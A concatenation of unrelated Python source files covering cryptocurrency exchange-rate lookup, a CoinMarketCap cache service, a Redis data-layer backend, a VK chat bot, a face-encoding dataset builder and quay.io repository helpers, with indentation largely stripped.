keys = inv.setdefault(v, [])
keys.append(k)
return inv
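# Worked example (sketch) of dictinvert's behavior:
#   dictinvert({'Bittrex': ['BTC'], 'Poloniex': ['BTC', 'USD']})
#   -> {'BTC': ['Bittrex', 'Poloniex'], 'USD': ['Poloniex']}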
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
return json.loads(open(path, 'r').read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
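        # Worked example (sketch): for a 2-decimal currency with commas enabled,
        # ccy_amount_str(Decimal('1234.5'), True) -> '1,234.50'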
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
__init__.py
|
import time
import threading
from ..token import Token
from ..worker import WorkerCircularQueue, Worker
class CMCService:
def __init__(self, update_interval: float = 15, apikeys=None, start=True) -> None:
self.__lock = threading.Lock()
self.__cache = {}
self.__q = WorkerCircularQueue()
self.__kill = False
if apikeys:
for k in apikeys:
self.__q.add(Worker(k))
else:
self.__q.add(Worker())
self.__update()
if start:
self.start_service(update_interval)
def __update(self):
worker = self.__q.next()
tokens = worker.fetch_all()
with self.__lock:
for token in tokens:
self.__cache[token.name] = token
def __update_service(self, update_interval: float = 15) -> None:
start = time.time()
while True:
if self.__kill:
return
if time.time() - start > update_interval:
                start = time.time()
self.__update()
def fetch_token(self, name: str) -> Token:
with self.__lock:
return self.__cache[name]
def kill_service(self):
self.__kill = True
def start_service(self, update_interval: float = 15):
self.__kill = False
threading.Thread(target=self.__update_service, kwargs={'update_interval': update_interval}).start()
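# Illustrative usage sketch (assumes Worker fetches CoinMarketCap listings and Token
# exposes a .name attribute, as implied above; token name and API key are hypothetical):
#   svc = CMCService(update_interval=30, apikeys=["CMC_API_KEY"], start=True)
#   btc = svc.fetch_token("Bitcoin")   # returns the cached Token for that name
#   svc.kill_service()                 # stops the background update loop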
|
redis.py
|
# Copyright (c) 2019 AT&T Intellectual Property.
# Copyright (c) 2018-2019 Nokia.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This source code is part of the near-RT RIC (RAN Intelligent Controller)
# platform project (RICP).
#
"""The module provides implementation of Shared Data Layer (SDL) database backend interface."""
import contextlib
import threading
from typing import (Callable, Dict, Set, List, Optional, Tuple, Union)
import zlib
import redis
from redis import Redis
from redis.sentinel import Sentinel
from redis.lock import Lock
from redis._compat import nativestr
from redis import exceptions as redis_exceptions
from ricsdl.configuration import _Configuration
from ricsdl.exceptions import (
RejectedByBackend,
NotConnected,
BackendError
)
from .dbbackend_abc import DbBackendAbc
from .dbbackend_abc import DbBackendLockAbc
@contextlib.contextmanager
def _map_to_sdl_exception():
"""Translates known redis exceptions into SDL exceptions."""
try:
yield
except(redis_exceptions.ResponseError) as exc:
raise RejectedByBackend("SDL backend rejected the request: {}".
format(str(exc))) from exc
except(redis_exceptions.ConnectionError, redis_exceptions.TimeoutError) as exc:
raise NotConnected("SDL not connected to backend: {}".
format(str(exc))) from exc
except(redis_exceptions.RedisError) as exc:
raise BackendError("SDL backend failed to process the request: {}".
format(str(exc))) from exc
class PubSub(redis.client.PubSub):
def __init__(self, event_separator, connection_pool, ignore_subscribe_messages=False):
super().__init__(connection_pool, shard_hint=None, ignore_subscribe_messages=ignore_subscribe_messages)
self.event_separator = event_separator
def handle_message(self, response, ignore_subscribe_messages=False):
"""
Parses a pub/sub message. If the channel or pattern was subscribed to
with a message handler, the handler is invoked instead of a parsed
message being returned.
Adapted from: https://github.com/andymccurdy/redis-py/blob/master/redis/client.py
"""
message_type = nativestr(response[0])
if message_type == 'pmessage':
message = {
'type': message_type,
'pattern': response[1],
'channel': response[2],
'data': response[3]
}
elif message_type == 'pong':
message = {
'type': message_type,
'pattern': None,
'channel': None,
'data': response[1]
}
else:
message = {
'type': message_type,
'pattern': None,
'channel': response[1],
'data': response[2]
}
# if this is an unsubscribe message, remove it from memory
if message_type in self.UNSUBSCRIBE_MESSAGE_TYPES:
if message_type == 'punsubscribe':
pattern = response[1]
if pattern in self.pending_unsubscribe_patterns:
self.pending_unsubscribe_patterns.remove(pattern)
self.patterns.pop(pattern, None)
else:
channel = response[1]
if channel in self.pending_unsubscribe_channels:
self.pending_unsubscribe_channels.remove(channel)
self.channels.pop(channel, None)
if message_type in self.PUBLISH_MESSAGE_TYPES:
# if there's a message handler, invoke it
if message_type == 'pmessage':
handler = self.patterns.get(message['pattern'], None)
else:
handler = self.channels.get(message['channel'], None)
if handler:
# Need to send only channel and notification instead of raw
# message
message_channel = self._strip_ns_from_bin_key('', message['channel'])
message_data = message['data'].decode('utf-8')
messages = message_data.split(self.event_separator)
handler(message_channel, messages)
return message_channel, messages
elif message_type != 'pong':
# this is a subscribe/unsubscribe message. ignore if we don't
# want them
if ignore_subscribe_messages or self.ignore_subscribe_messages:
return None
return message
@classmethod
def _strip_ns_from_bin_key(cls, ns: str, nskey: bytes) -> str:
try:
redis_key = nskey.decode('utf-8')
except UnicodeDecodeError as exc:
msg = u'Namespace %s key conversion to string failed: %s' % (ns, str(exc))
raise RejectedByBackend(msg)
nskey = redis_key.split(',', 1)
if len(nskey) != 2:
msg = u'Namespace %s key:%s has no namespace prefix' % (ns, redis_key)
raise RejectedByBackend(msg)
return nskey[1]
class RedisBackend(DbBackendAbc):
"""
A class providing an implementation of database backend of Shared Data Layer (SDL), when
backend database solution is Redis.
Args:
configuration (_Configuration): SDL configuration, containing credentials to connect to
Redis database backend.
"""
def __init__(self, configuration: _Configuration) -> None:
super().__init__()
self.next_client_event = 0
self.event_separator = configuration.get_event_separator()
self.clients = list()
with _map_to_sdl_exception():
self.clients = self.__create_redis_clients(configuration)
def __del__(self):
self.close()
def __str__(self):
out = {"DB type": "Redis"}
for i, r in enumerate(self.clients):
out["Redis client[" + str(i) + "]"] = str(r)
return str(out)
def is_connected(self):
is_connected = True
with _map_to_sdl_exception():
for c in self.clients:
if not c.redis_client.ping():
is_connected = False
break
return is_connected
def close(self):
for c in self.clients:
c.redis_client.close()
def set(self, ns: str, data_map: Dict[str, bytes]) -> None:
db_data_map = self.__add_data_map_ns_prefix(ns, data_map)
with _map_to_sdl_exception():
self.__getClient(ns).mset(db_data_map)
def set_if(self, ns: str, key: str, old_data: bytes, new_data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command('SETIE', db_key, new_data, old_data)
def set_if_not_exists(self, ns: str, key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).setnx(db_key, data)
def get(self, ns: str, keys: List[str]) -> Dict[str, bytes]:
ret = dict()
db_keys = self.__add_keys_ns_prefix(ns, keys)
with _map_to_sdl_exception():
values = self.__getClient(ns).mget(db_keys)
for idx, val in enumerate(values):
# return only key values, which has a value
if val is not None:
ret[keys[idx]] = val
return ret
def find_keys(self, ns: str, key_pattern: str) -> List[str]:
db_key_pattern = self.__add_key_ns_prefix(ns, key_pattern)
with _map_to_sdl_exception():
ret = self.__getClient(ns).keys(db_key_pattern)
return self.__strip_ns_from_bin_keys(ns, ret)
def find_and_get(self, ns: str, key_pattern: str) -> Dict[str, bytes]:
# todo: replace below implementation with redis 'NGET' module
ret = dict() # type: Dict[str, bytes]
with _map_to_sdl_exception():
matched_keys = self.find_keys(ns, key_pattern)
if matched_keys:
ret = self.get(ns, matched_keys)
return ret
def remove(self, ns: str, keys: List[str]) -> None:
db_keys = self.__add_keys_ns_prefix(ns, keys)
with _map_to_sdl_exception():
self.__getClient(ns).delete(*db_keys)
def remove_if(self, ns: str, key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command('DELIE', db_key, data)
def add_member(self, ns: str, group: str, members: Set[bytes]) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).sadd(db_key, *members)
def remove_member(self, ns: str, group: str, members: Set[bytes]) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).srem(db_key, *members)
def remove_group(self, ns: str, group: str) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).delete(db_key)
def get_members(self, ns: str, group: str) -> Set[bytes]:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).smembers(db_key)
def is_member(self, ns: str, group: str, member: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).sismember(db_key, member)
def group_size(self, ns: str, group: str) -> int:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).scard(db_key)
def set_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
data_map: Dict[str, bytes]) -> None:
db_data_map = self.__add_data_map_ns_prefix(ns, data_map)
channels_and_events_prepared = []
total_events = 0
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"MSETMPUB",
len(db_data_map),
total_events,
*[val for data in db_data_map.items() for val in data],
*channels_and_events_prepared,
)
def set_if_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]], key: str,
old_data: bytes, new_data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared = []
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("SETIEMPUB", db_key, new_data, old_data,
*channels_and_events_prepared)
return ret == b"OK"
def set_if_not_exists_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("SETNXMPUB", db_key, data,
*channels_and_events_prepared)
return ret == b"OK"
def remove_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
keys: List[str]) -> None:
db_keys = self.__add_keys_ns_prefix(ns, keys)
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"DELMPUB",
len(db_keys),
total_events,
*db_keys,
*channels_and_events_prepared,
)
def remove_if_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]], key: str,
data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("DELIEMPUB", db_key, data,
*channels_and_events_prepared)
return bool(ret)
def remove_all_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]]) -> None:
keys = self.__getClient(ns).keys(self.__add_key_ns_prefix(ns, "*"))
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"DELMPUB",
len(keys),
total_events,
*keys,
*channels_and_events_prepared,
)
def subscribe_channel(self, ns: str, cb: Callable[[str, List[str]], None],
channels: List[str]) -> None:
channels = self.__add_keys_ns_prefix(ns, channels)
for channel in channels:
with _map_to_sdl_exception():
redis_ctx = self.__getClientConn(ns)
redis_ctx.redis_pubsub.subscribe(**{channel: cb})
if not redis_ctx.pubsub_thread.is_alive() and redis_ctx.run_in_thread:
redis_ctx.pubsub_thread = redis_ctx.redis_pubsub.run_in_thread(sleep_time=0.001,
daemon=True)
def unsubscribe_channel(self, ns: str, channels: List[str]) -> None:
channels = self.__add_keys_ns_prefix(ns, channels)
for channel in channels:
with _map_to_sdl_exception():
self.__getClientConn(ns).redis_pubsub.unsubscribe(channel)
def start_event_listener(self) -> None:
redis_ctxs = self.__getClientConns()
for redis_ctx in redis_ctxs:
if redis_ctx.pubsub_thread.is_alive():
raise RejectedByBackend("Event loop already started")
if redis_ctx.redis_pubsub.subscribed and len(redis_ctx.redis_client.pubsub_channels()) > 0:
redis_ctx.pubsub_thread = redis_ctx.redis_pubsub.run_in_thread(sleep_time=0.001, daemon=True)
redis_ctx.run_in_thread = True
def handle_events(self) -> Optional[Tuple[str, List[str]]]:
if self.next_client_event >= len(self.clients):
self.next_client_event = 0
redis_ctx = self.clients[self.next_client_event]
self.next_client_event += 1
if redis_ctx.pubsub_thread.is_alive() or redis_ctx.run_in_thread:
raise RejectedByBackend("Event loop already started")
try:
return redis_ctx.redis_pubsub.get_message(ignore_subscribe_messages=True)
except RuntimeError:
return None
def __create_redis_clients(self, config):
clients = list()
cfg_params = config.get_params()
if cfg_params.db_cluster_addr_list is None:
clients.append(self.__create_legacy_redis_client(cfg_params))
else:
for addr in cfg_params.db_cluster_addr_list.split(","):
client = self.__create_redis_client(cfg_params, addr)
clients.append(client)
return clients
def __create_legacy_redis_client(self, cfg_params):
return self.__create_redis_client(cfg_params, cfg_params.db_host)
def __create_redis_client(self, cfg_params, addr):
new_sentinel = None
new_redis = None
if cfg_params.db_sentinel_port is None:
new_redis = Redis(host=addr, port=cfg_params.db_port, db=0, max_connections=20)
else:
sentinel_node = (addr, cfg_params.db_sentinel_port)
master_name = cfg_params.db_sentinel_master_name
new_sentinel = Sentinel([sentinel_node])
new_redis = new_sentinel.master_for(master_name)
new_redis.set_response_callback('SETIE', lambda r: r and nativestr(r) == 'OK' or False)
new_redis.set_response_callback('DELIE', lambda r: r and int(r) == 1 or False)
redis_pubsub = PubSub(self.event_separator, new_redis.connection_pool, ignore_subscribe_messages=True)
pubsub_thread = threading.Thread(target=None)
run_in_thread = False
return _RedisConn(new_redis, redis_pubsub, pubsub_thread, run_in_thread)
def __getClientConns(self):
return self.clients
def __getClientConn(self, ns):
clients_cnt = len(self.clients)
client_id = self.__get_hash(ns) % clients_cnt
return self.clients[client_id]
def __getClient(self, ns):
clients_cnt = len(self.clients)
client_id = 0
if clients_cnt > 1:
client_id = self.__get_hash(ns) % clients_cnt
return self.clients[client_id].redis_client
@classmethod
def __get_hash(cls, str):
return zlib.crc32(str.encode())
@classmethod
def __add_key_ns_prefix(cls, ns: str, key: str):
return '{' + ns + '},' + key
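        # e.g. (sketch): __add_key_ns_prefix('sdl', 'mykey') -> '{sdl},mykey'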
@classmethod
def __add_keys_ns_prefix(cls, ns: str, keylist: List[str]) -> List[str]:
ret_nskeys = []
for k in keylist:
ret_nskeys.append('{' + ns + '},' + k)
return ret_nskeys
@classmethod
def __add_data_map_ns_prefix(cls, ns: str, data_dict: Dict[str, bytes]) -> Dict[str, bytes]:
ret_nsdict = {}
for key, val in data_dict.items():
ret_nsdict['{' + ns + '},' + key] = val
return ret_nsdict
@classmethod
def __strip_ns_from_bin_keys(cls, ns: str, nskeylist: List[bytes]) -> List[str]:
ret_keys = []
for k in nskeylist:
try:
redis_key = k.decode("utf-8")
except UnicodeDecodeError as exc:
msg = u'Namespace %s key conversion to string failed: %s' % (ns, str(exc))
raise RejectedByBackend(msg)
nskey = redis_key.split(',', 1)
if len(nskey) != 2:
msg = u'Namespace %s key:%s has no namespace prefix' % (ns, redis_key)
raise RejectedByBackend(msg)
ret_keys.append(nskey[1])
return ret_keys
def _prepare_channels(self, ns: str,
channels_and_events: Dict[str, List[str]]) -> Tuple[List, int]:
channels_and_events_prepared = []
for channel, events in channels_and_events.items():
one_channel_join_events = None
for event in events:
if one_channel_join_events is None:
channels_and_events_prepared.append(self.__add_key_ns_prefix(ns, channel))
one_channel_join_events = event
else:
one_channel_join_events = one_channel_join_events + self.event_separator + event
channels_and_events_prepared.append(one_channel_join_events)
pairs_cnt = int(len(channels_and_events_prepared) / 2)
return channels_and_events_prepared, pairs_cnt
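        # Worked example (sketch, assuming the configured event separator is '___'):
        #   _prepare_channels('ns1', {'ch1': ['ev1', 'ev2']})
        #   -> (['{ns1},ch1', 'ev1___ev2'], 1)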
def get_redis_connection(self, ns: str):
"""Return existing Redis database connection valid for the namespace."""
return self.__getClient(ns)
class _RedisConn:
"""
Internal class container to hold redis client connection
"""
def __init__(self, redis_client, pubsub, pubsub_thread, run_in_thread):
self.redis_client = redis_client
self.redis_pubsub = pubsub
self.pubsub_thread = pubsub_thread
self.run_in_thread = run_in_thread
def __str__(self):
return str(
{
"Client": repr(self.redis_client),
"Subscrions": self.redis_pubsub.subscribed,
"PubSub thread": repr(self.pubsub_thread),
"Run in thread": self.run_in_thread,
}
)
class RedisBackendLock(DbBackendLockAbc):
"""
A class providing an implementation of database backend lock of Shared Data Layer (SDL), when
backend database solution is Redis.
Args:
ns (str): Namespace under which this lock is targeted.
name (str): Lock name, identifies the lock key in a Redis database backend.
expiration (int, float): Lock expiration time after which the lock is removed if it hasn't
been released earlier by a 'release' method.
redis_backend (RedisBackend): Database backend object containing connection to Redis
database.
"""
lua_get_validity_time = None
# KEYS[1] - lock name
# ARGS[1] - token
# return < 0 in case of failure, otherwise return lock validity time in milliseconds.
LUA_GET_VALIDITY_TIME_SCRIPT = """
local token = redis.call('get', KEYS[1])
if not token then
return -10
end
if token ~= ARGV[1] then
return -11
end
return redis.call('pttl', KEYS[1])
"""
def __init__(self, ns: str, name: str, expiration: Union[int, float],
redis_backend: RedisBackend) -> None:
super().__init__(ns, name)
self.__redis = redis_backend.get_redis_connection(ns)
with _map_to_sdl_exception():
redis_lockname = '{' + ns + '},' + self._lock_name
self.__redis_lock = Lock(redis=self.__redis, name=redis_lockname, timeout=expiration)
self._register_scripts()
def __str__(self):
return str(
{
"lock DB type": "Redis",
"lock namespace": self._ns,
"lock name": self._lock_name,
"lock status": self._lock_status_to_string()
}
)
def acquire(self, retry_interval: Union[int, float] = 0.1,
retry_timeout: Union[int, float] = 10) -> bool:
succeeded = False
self.__redis_lock.sleep = retry_interval
with _map_to_sdl_exception():
succeeded = self.__redis_lock.acquire(blocking_timeout=retry_timeout)
return succeeded
def release(self) -> None:
with _map_to_sdl_exception():
self.__redis_lock.release()
def refresh(self) -> None:
with _map_to_sdl_exception():
self.__redis_lock.reacquire()
def get_validity_time(self) -> Union[int, float]:
validity = 0
if self.__redis_lock.local.token is None:
msg = u'Cannot get validity time of an unlocked lock %s' % self._lock_name
raise RejectedByBackend(msg)
with _map_to_sdl_exception():
validity = self.lua_get_validity_time(keys=[self.__redis_lock.name],
args=[self.__redis_lock.local.token],
client=self.__redis)
if validity < 0:
msg = (u'Getting validity time of a lock %s failed with error code: %d'
% (self._lock_name, validity))
raise RejectedByBackend(msg)
ftime = validity / 1000.0
if ftime.is_integer():
return int(ftime)
return ftime
def _register_scripts(self):
cls = self.__class__
client = self.__redis
if cls.lua_get_validity_time is None:
cls.lua_get_validity_time = client.register_script(cls.LUA_GET_VALIDITY_TIME_SCRIPT)
def _lock_status_to_string(self) -> str:
try:
if self.__redis_lock.locked():
if self.__redis_lock.owned():
return 'locked'
return 'locked by someone else'
return 'unlocked'
except(redis_exceptions.RedisError) as exc:
return f'Error: {str(exc)}'
|
olya.py
|
import copy
import json
import logging
import queue
import threading
import attr
from api.models.updates import MessageUpdate
from api.vk import VkApi
logging.basicConfig(**{
'format': '%(asctime)s %(levelname)s %(name)-15s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S'
})
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
@attr.s
class KeyboardButton(object):
text = attr.ib()
label = attr.ib()
color = attr.ib(default='Default')
payload = attr.ib(default=attr.Factory(dict))
COLOR_PRIMARY = 'Primary'
COLOR_DEFAULT = 'Default'
COLOR_NEGATIVE = 'Negative'
COLOR_POSITIVE = 'Positive'
def to_dict(self):
return {
'action': {
'text': self.text,
'label': self.label,
'payload': json.dumps(self.payload)
},
'color': self.color
}
def prepare_keyboard(buttons, one_time=False):
buttons = copy.deepcopy(buttons)
for i, row in enumerate(buttons):
for j, button in enumerate(row):
buttons[i][j] = button.to_dict()
return {
'one_time': one_time,
'buttons': buttons
}
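# Hedged example (illustration only, not part of the original bot): builds the
# JSON keyboard payload expected by VK's messages.send from KeyboardButton
# rows. The button texts and labels below are made up.
def _example_keyboard():
    rows = [
        [KeyboardButton(text='Yes', label='yes', color=KeyboardButton.COLOR_POSITIVE)],
        [KeyboardButton(text='No', label='no', color=KeyboardButton.COLOR_NEGATIVE)],
    ]
    return json.dumps(prepare_keyboard(rows, one_time=True), ensure_ascii=False)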
def update_handler(messages: queue.Queue, vk_api: VkApi, is_chat):
while True:
try:
long_poll_server, error = vk_api.messages.get_long_poll_server()
if error is not None:
return
while True:
ts, updates = vk_api.messages.get_long_poll_update(long_poll_server, 2)
for update in updates:
if isinstance(update, MessageUpdate):
messages.put((is_chat, update))
long_poll_server.ts = ts
except Exception as e:
logger.exception(e)
def message_handler(messages: queue.Queue, chat: VkApi, group: VkApi):
while True:
message: MessageUpdate
is_chat, message = messages.get()
logger.info('Message ({}): {}'.format(is_chat, message))
if not message.is_outbox():
if is_chat:
pass
else:
buttons = [
[KeyboardButton(text='Ура!', label='ura', )]
]
keyboard = {
'one_time': False,
'buttons': [[{
'action': {
'type': 'text',
'payload': json.dumps({'buttons': '1'}),
'label': 'Предыдущая',
},
'color': 'negative'
},
{
'action': {
'type': 'text',
'payload': json.dumps({'buttons': '2'}),
'label': 'Pred',
},
'color': 'primary'
}
]]
}
keyboard = json.dumps(keyboard, ensure_ascii=False).encode('utf-8')
keyboard = str(keyboard.decode('utf-8'))
group.messages.send(peer_id=2000000001,
message=message.text,
keyboard=keyboard)
messages.task_done()
def main():
with open('secrets.json', 'r') as file:
secrets = json.load(file)
chat_bot = VkApi(access_token=secrets['chat'])
group_bot = VkApi(access_token=secrets['group'])
_, res = group_bot.messages.get_conversations()
print(res)
messages_pool = queue.Queue(maxsize=100)
message_handler_thread = threading.Thread(target=message_handler,
args=[messages_pool, chat_bot, group_bot])
# chat_bot_update_thread = threading.Thread(target=update_handler, args=[messages_pool, chat_bot, True])
group_bot_update_thread = threading.Thread(target=update_handler, args=[messages_pool, group_bot, False])
message_handler_thread.start()
# chat_bot_update_thread.start()
group_bot_update_thread.start()
while True:
text = input()
if text == 'quit':
break
if __name__ == '__main__':
main()
|
dataset.py
|
import os
import face_recognition
import progressbar
import pickle
import multiprocessing
import numpy as np
import threading
class Generate:
"""
Used for creating segmented facial data.
A new dataset is created for each person
Attributes
----------
KNOWN_FACES_DIR : str
Path to known faces directory
known_faces : List
Used for storing all the encoded data
known_names : List
Used for storing all the name data
FUNCTIONS
----------
resolve -> Void
Initiates the resolve function
resolve_images -> Void
Resolves all the images in the known faces directory
save -> Void
Saves the data to a pickle file
"""
def __init__(self) -> None:
self.KNOWN_FACES_DIR = "Images/Known"
self.known_faces = []
self.known_names = []
def resolve(self, name, dirname):
count = sum([len(files)
for r, d, files in os.walk(f"{self.KNOWN_FACES_DIR}/{name}")])
bar = progressbar.ProgressBar(maxval=count,
widgets=[progressbar.Bar('⬛', '[', ']', '⬜'), ' ', progressbar.Percentage()]).start()
dir_list = os.listdir(f"{self.KNOWN_FACES_DIR}/{name}")
arr = np.array(dir_list)
newarr = np.array_split(arr, 120)
        threads = [threading.Thread(
            target=self.resolve_images, args=[arr, name, bar, dirname]) for arr in newarr]
        # Start every worker thread first, then join them all, so the chunks
        # are processed in parallel instead of one after another.
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
self.save(dirname)
bar.finish()
def resolve_images(self, arr, name, bar, dirname):
for filename in arr:
image = face_recognition.load_image_file(
f"{self.KNOWN_FACES_DIR}/{name}/{filename}")
encodings = face_recognition.face_encodings(image)
if len(encodings) > 0:
encoding = encodings[0]
self.known_faces.append(encoding)
self.known_names.append(name)
bar.update(value=bar.currval+1)
self.save(dirname)
def save(self, dirname):
if not os.path.isdir("dataset"):
os.makedirs("dataset")
if not os.path.isdir(f"dataset/{str(dirname)}"):
os.makedirs(f'dataset/{str(dirname)}')
with open(f'dataset/{str(dirname)}/faces.dat', 'wb') as f:
pickle.dump(self.known_faces, f)
open(f"dataset/{str(dirname)}/names.txt",
'w+').write(str(self.known_names))
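# Hedged usage sketch (illustration only, not part of the original script):
# resolves a single person's folder of images into encodings and pickles them.
# The folder name 'Alice' is a placeholder and is assumed to exist under
# Images/Known.
def _example_generate():
    gen = Generate()
    gen.resolve('Alice', 'Alice')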
def main():
print("Initiating all processes...")
dir_list = os.listdir("Images/Known")
arr = np.array(dir_list)
newarr = np.array_split(arr, 35)
for arr in newarr:
gen = Generate()
thread = multiprocessing.Process(
target=res, args=[arr, gen])
thread.start()
# thread.join()
def res(arr, gen):
    processes = [multiprocessing.Process(target=gen.resolve, args=[name, name])
                 for name in arr]
    # Start every process first, then join them all, so the names in this chunk
    # are resolved in parallel rather than sequentially.
    for process in processes:
        process.start()
    for process in processes:
        process.join()
if __name__ == "__main__":
main()
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
QUAY_IO_TIMEOUT = 10
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers, timeout=QUAY_IO_TIMEOUT)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
